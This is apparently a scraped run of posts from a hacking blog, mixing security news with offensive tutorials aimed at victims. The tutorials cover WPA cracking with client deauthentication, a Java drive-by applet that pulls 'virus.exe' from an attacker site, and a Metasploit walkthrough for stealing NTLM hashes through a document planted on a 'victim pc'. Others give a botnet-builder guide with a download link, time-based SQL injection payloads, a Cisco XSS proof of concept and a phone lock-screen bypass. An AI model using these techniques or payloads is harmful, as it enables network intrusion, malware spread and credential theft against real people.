How To Crack A WPA Key With Aircrack-ng

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2 

Step 1 : Setting up your network device 

To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

 Step 2 : Reconnaissance 

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.

 Step 3 : Capturing Packets 

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 

Step 4 : De-Authentication Technique 

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.

 So, now we have successfully acquired a WPA Handshake.

 Step 5 : Cracking WPA/WAP2 

Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.

Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author 

Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.

Java Hits Another Roadblock - Found To Be A Threat For Browsers

Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its inability to refrain from being attacked and exploited. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using various tactics.


According to a report about a 100 million PCs are vulnerable to various attacks leading to unauthorized access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.

Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.

According to Websense;

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do — examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.

Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.

You can Download source code from following website.

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:

(1)Viewstate eavesdroping & information disclosure

(2)Session Fixation

(3)Oracle Padding

ASafaWeb:- 

Automated Security Analyser for ASP.NET Websites . ASafaWeb simply makes HTTP requests to the site and looks for responses which suggest there might be configuration issues.

DOM Based XSS In Microsoft

           
Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the DOM based XSS i found inside AVG, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.

I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:

The vulnerability occurs due to lack of filtering being done inside riotracking script (Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.

How Attackers Spread Malware With Java Drive by?

Hello RHA fans,

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.



Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!

What is java drive by:

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job.

Tools we need in this game are:

i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
iii) A java script which is the backbone of your game.

Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear

Java Code: 

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">


So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.

 About the author

This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials. 

Web-application Fingerprinting

Methods of Web Application Finger Printing

Historically Identification of Open Source applications have been easier as the behavior pattern and all the source codes are publically open. In the early days web application identification was as simple as looking in the footer of the Page of text like “Powered by <XYZ>”. However as more and more Server admin became aware of this simple stuff so is the Pen Testers approach became more complex towards identification of web application running on remote machine.

HTML Data Inspection

This is the simplest method in which manual approach is to open the site on browser and look at its source code, similarly on automated manner your tool will connect to site, download the page and then will run some basic regular expression patterns which can give you the results in yes or no. Basically what we are looking for is unique pattern specific to web software. Examples of such patterns are

1) Wordpress
Meta Tag Folder Names

Folder Names in Link section

Ever green notice at the bottom

2) OWA
URL pattern
http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/

4) SharePoint Portal
URL Pattern: /_layouts/* And similarly for majority of applications we can create regular expression rules to identify them.

These regular expression’s combined together as a monolithic tool to identify all in one go or as a pluggable architecture for creating one pattern file for each type and work on it. Example of tools using this technique includes browser plugin’s like Wapplyzer and web technology finder and similar tools.

File and Folder Presence (HTTP response codes)

This approach doesn’t download the page however it starts looking for obvious trails of an application by directly hitting the URL and in course identifying found and not found application list. In starting days of internet this was easy, just download headers and see if it’s 200 OK or 404 not found and you are done.

However in current scenario, people have been putting up custom 404 Pages and are actually sending 200 OK in case the page is not found. This complicates the efforts and hence the new approach is as follows.

1) Download default page 200 OK.
2) Download a file which is guaranteed to be non-existing then mark it as a template for 404 and then proceed with detection logic.

Based on this assumption and knowledge this kind of tools start looking for known files and folders on a website and try to determine the exact application name and version. Example of such scenario would be wp-login.php => wordpress /owa/ => Microsoft outlook web frontend.

Checksum Based identification

This is relatively a newer approach considered by far as most accurate approach in terms on application and specific version identification. This Technique basically works on below pattern.

1) Create checksum local file and store in DB
2) Download static file from remote server
3) Create checksum
4) Compare with checksum stored in db and identified

Disadvantages of Current automated Solutions

1) First and foremost these tools get noisy especially in auto detection modes.
2) Large numbers of 404’s can immediately trigger alarms across the places.
3) Secondly they generally rely on the URL pattern we gave and fail to look beyond that. However it might be the case that site main link has reference links to its blog which might not be updated and could open gates for us.
4) They lack the humanly fuzziness.

Cisco ZeroClipboard Swf File XSS

The security of  the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the security hall of fames was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.
Recently, i was testing cisco for potential vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for "ZeroClipboard Xss".

What Is ZeroClipboard?

The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.


I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained zeroclipboard.xss. So i began testing for XSS and bingo it worked.


Cisco Swf POC

http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500

Vulnerable Code

public function ZeroClipboard()
{ .... var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; .... 
ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);

As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.

Further Reading

If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:

http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
https://github.com/jonrohan/ZeroClipboard/issues/14

Vulnerability Discovered In iPhone - Poses Serious Threat To Users

Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.

A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.

Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.

Ways to get infected:

1. Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.
2. Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.

To avoid this attack one must follow these rules:

• You should only install profiles from trusted websites or applications.
• Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).
• Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!


WebSense has kept up to speed in this game and they have released a report to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.

Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.

Genre of sites that were mainly attacked were:

• Information Technology
• Business and Economy
• Sex
• Travel
• Shopping

Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.

- Social Media was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.

- Mobile Platform were again easily attacked due to jailbreaking, and download and installation of malicious apps.

Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.

WebSense stated that malicious apps mainly require three permissions:

• 82% of malicious apps send, receive, read or write SMS message.
• 12.5% malicious apps require RECEIVE_WAP_PUSH permission.
• 10% malicious apps asked for permission to install other apps.

- Email was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.

Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".

According to WebSense the following categories of malicious web links are present in Spam Email:

• Potentially Damaging Content | Suspicious sites with little or no useful content.
• Web and Email Spam | Sites used in unsolicited commercial email.
• Malicious Websites | Sites containing malicious code.
• Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.
• Malicious Embedded iFrame.

You can read the full report by WebSense which clearly states;

“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”

Wise friends, we are no longer... ALONE!

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Vulnerabilities Fixed in App Store Almost After A Year

It is being reported that Apple has ignored its network's security for more than a year. A problem that a  Google developer has pointed out.

Google Researcher, Elie Bursztein has stated on this blog that he had informed Apple of the security problems present in App Store that allowed attackers to steal passwords and/or install unwanted or expensive applications.
This was done by exploiting Apple's resistance to use encryptions when any iDevice logged into App Store. This allowed the attacker to intercept communication occurring between an online user's device and App Store and insert his own commands into the system.

The vulnerability could be exploited to carry out quite a few attacks on the user according to Elie:

- Password stealing: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.

- App swapping: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.

- App fake upgrade: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.

- Preventing application installation: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.

- Privacy leak: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.

Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained

Do you want to elude Note II's security even for a brief moment? With iOS 6.1.2 being owned by hackers, it was time that someone took a look at Android's vulnerabilities.

The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.

You can by-pass iPhone, iPad or iPod's security by following the steps given below:

1. Make sure your device is locked.

2. Activate the screen.

3. Enter "Emergency Call".

4. Tap on the "ICE" button found on the bottom left.

5. Press and hold the home button for a few seconds and then release it.

6. The phone's home screen will be displayed.

7. While the home screen is visible click on any app or widget and it will launch without the password.

You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.

Disclaimer: We request our readers to attempt the above hack at their own risk and for their own knowledge.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

First Hack the Victim PC Using Metaspolit (click here)

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password

The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!

Well, well well! It seems like our own favourite ethical hacker, Rafay Baloch, is about to meet the clan  with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)

Security researchers and ethical hackers are massing up in Vancouver at the CanSecWest conference this time of the year. The crowd is going to be equipped and ready to hunt down every vulnerability possible in Chrome, Internet, Explorer and Java (good riddance since Java has attacked over and over again since 2013 began). And in doing so, they will be able to bag generous cash prizes.


Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.

The rules are simple:

1. Vulnerability has to be previously unknown.
2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion
3. A full sandbox (if present) escape is required to win.

Rules and Regulations from Pwn2Own can be found on their link.

The list of targets and the cash prizes to be won are:

• Web Browser
• Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Microsoft Internet Explorer, either:
• IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or
• IE 9 on Windows 7:  $75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Mozilla Firefox on Windows 7:  $60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Apple Safari on OS X Mountain Lion:  $65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Web Browser Plug-ins using Internet Explorer 9 on Windows 7
• Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
• Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)

On the other hand, Google is arranging its own competition with the name of Pwnium 3. Pwnium 3 focuses on finding vulnerabilities in Chrome OS and is offering a more-than-generous $3.14159 million is reward. This particular competition will be based on Samsung S5 550 Chromebook running the latest version of Chrome OS. You will need to successfully exploit the browser or system of the device logged in as a guest or a user or "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."

Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.

Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.

Our own bounty hunter and ethical hacker Rafay Baloch has done so many a times and has been awarded with prize money from PayPal, job offers from big-shot companies and cell phones from Nokia. A proud people we are!

Rafay Baloch and his team members (including I) have made it our mission to spread awareness regarding Ethical Hacking and its advantages. Believe us people, its always better to do the right thing and get paid, then do the wrong one and get caught.

Let the hunting begin!

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Java Zero-Day Vulnerabilities Fixed By Oracle

We recently reported two Java zero-day vulnerabilities that were spotted in the wild by FireEye now identified as the CVE-2013-1493 and CVE-2013-0809. One of these (CVE-2103-1493) was exploited by hackers to install McRat, an executable file, onto the user's machine and was therefore found to be more critical than the other.

These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update. But active exploitation of the above stated vulnerabilities has driven the company to roll out an Emergency update. 

The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013).  However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this Security Alert.

Previously, we suggested our users to uninstall Java if they didn't wanna be preyed upon via the McRat executable file but Oracle has been kind enough to provide us with a more suitable option to install the new version of Java or autoupdate it.

Desktop users should also be aware that Oracle has recently switched Java security settings to “high” by default.  This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed.  As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet.  In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.

We would request our readers to update their versions of Java as soon as possible to refrain from being attacked. As they say, 'Prevention is better than cure'!

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

MySQL Injection Time Based

We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare.

Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi

http://technet.microsoft.com/en-us/library/cc512676.aspx

and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet

OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.

Tested on Peruggia application.

Lets gO!

Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.

But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.

each DBMS have different type of function to use,but the steps usually quite similar.

In MSSQL we use WAITFOR DELAY

In POSTGRES we use PG_DELAY()

and so on..do check it on pentestmonkey cheatsheet :D

Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.

Test it using this command

pic_id=13 and sleep(5)--

As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.

Lets proceed to check the current user.

Here's the command the we are going to use

pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--

Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.

From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?

Because the 1st character of the current user start with 'p'.. not 'a' or 'h'

Then you can proceed to check for its 2nd character and so on.

pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--

pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--

so on..

So go on with table_name guessing.

pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.

While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!

How about guessing the column_name?Its easy.

pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

See the image above?Still need any explanation? I bet you guys already understand it! :D

Get the data mode!

pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds. 

And then proceed to test the 2nd,3rd char and so on..

The image shown that the username=admin..so is it correct?lets double check it

Yeahhh.its correct.

That's all for now!

Thanks,

@yappare

How Hackers Make Botnets To Infect Systems [Part 2]

Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check the first part in order to understand part two, as it is the sequel of How to setup a Botnet.

Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]

So in this part we will teach you how to setup a Botnet.

Step 1:

Now after hosting the server, Extract Bot builder in you computer.
Download it from here http://www.mediafire.com/?hb9ou6g50a620nb

Step 2:

After extracting, you'll a application for BOT Building with 'VNBuilder' name.
Run the application.
It would be like as shown in image:

 step 3:

Check the box in the below.

Step 4:

Now go in the 'Web Setting' Tab. Type the website where you have set your server in ROOT WEBSITE URL column. Remember your website url should be like www.yourwebsite.com this, No Http:// in starting. Leave the port number as it is. Now type the folder in which your server is set, And it should be like /folder name/. leave All other thing as it is. As it is shown in image:

 Step 5:

Now Go to Load settings tab, check the 'INSTALL LOADER TO START UP' option. Like in the image:

Step 6:

Proceed to last Tab BUILD LOADER, Now if you want to change icon of your virus than go to top right of under build loader tab, You can add icons their for your virus, additional icons are given with builder. You can even change the extention from .exe to .bat and few others, In the bottom of window you can find option to change extension. Now In the last click Build.
Builder will ask where to save with which name, provide your desire one.

Step 7:

You've successfully created Bot. Now in order to check whether the bot is working or not RUN it in you Computer, Turn your antivirus It'll detect the virus. After running virus, go and login in the server you made in part one of this tutorial. If your virus is created Successfully than you IP will be appearing in the server list with your computer name. Like mine:

If your Ip appearing, than you have configured Botnet successfully. Congratulations.
Thanks for reading, Stay tuned with us for more tutorials!

About The Author

This article has been written by Fahad awan, Who has recently joined RHA's team, We wish him best of luck and hope that he enjoys working for RHA.

Another Java Zero-Day Vulnerability Spotted In The Wild

So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by FireEye.

Java v1.6 and Java v1.7 Update 15 on browsers are being targeted this time around. The previously unknown and unpatched vulnerability exploits browsers to install a remote-access trojan named McRat.

McRat is a Windows Trojan therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.

According to FireEye researchers;

We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.

If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.

The next security updates are scheduled for 16th April but Oracle will be forced to push an Emergency update in the light of current events.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Exploiting XSS Vulnerabilites With Xenotix

Introduction

Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3^rdVulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS.

Some threats due to XSS

XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.

Client side code injection: A hacker can inject malicious codes and execute them at client side.

DOS: A hacker can perform DOS against a remote server or against the client itself.

Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.

Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS.

Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.

Defacing: Temporary or permanent defacement of web application is possible

What is Xenotix XSS Exploit Framework?

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features of Xenotix XSS Exploit Framework

Xenotix XSS Exploit Framework is divided into two module

       1.Scanner Module

·        Built in XSS Payloads

·        HTML5 compactable Payload list

·        XSS Auto mode Scanner

·        XSS Multi-Parameter Scanner

·        XSS Fuzzer

       2. Exploitation Framework

·        XSS Keylogger

·        XSS Executable Drive-by downloader

·        XSS Payload Encoder

·        XSS Reverse Shell

·        XSS DDoSer

·        XSS Cookie Thief

1. Scanner Module

[VIDEO] https://www.youtube.com/watch?v=CJEgO4_kd-8 [/VIDEO]

Built in Payload List

It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.

The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.

XSS Scanner Module

[VIDEO] https://www.youtube.com/watch?v=CJEgO4_kd-8[/VIDEO]

XSS Multi-Parameter Scanner

 

The Multi-Parameter XSS Scanner comes when you have multiple parameter to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameters separately.

XSS Fuzzer

 

 

